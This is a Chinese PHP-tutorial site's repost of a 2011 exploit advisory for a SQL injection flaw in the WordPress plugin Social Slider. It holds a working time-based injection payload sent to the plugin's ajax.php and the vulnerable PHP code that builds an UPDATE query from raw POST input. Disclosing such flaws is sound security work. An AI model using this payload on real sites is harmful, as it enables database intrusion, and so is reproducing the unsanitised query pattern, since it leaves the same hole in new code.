网站地图    收藏   

主页 > 后端 > 网站安全 >

Social Slider <= 5.6.5 SQL注射缺陷及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:46 作者: 阅读:

[导读] # Exploit Title: Social Slider = 5.6.5 SQL Injection Vulnerability# Date: 2011-08-05# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)# Software Link: http://......

# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip
# Version: 5.6.5 (已测试)
 
---------------
PoC (POST data)
---------------
http://www.2cto.com /wp-content/plugins/social-slider-2/ajax.php
 action=ZapiszPozycje&rA[]=1 AND SLEEP(5)
 
---------------
Vulnerable code
---------------
<?php
require_once(dirname(__FILE__).'/../../../wp-config.php');
global $wpdb, $table_prefix;
 
$SocialSliderArray = $_POST['rA'];
 
if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
    {
    $lC = 1;
    foreach ($SocialSliderArray as $recordIDValue)
        {
        $query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue;
        mysql_query($query);
        $lC = $lC + 1;  
        }
    }
?>
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论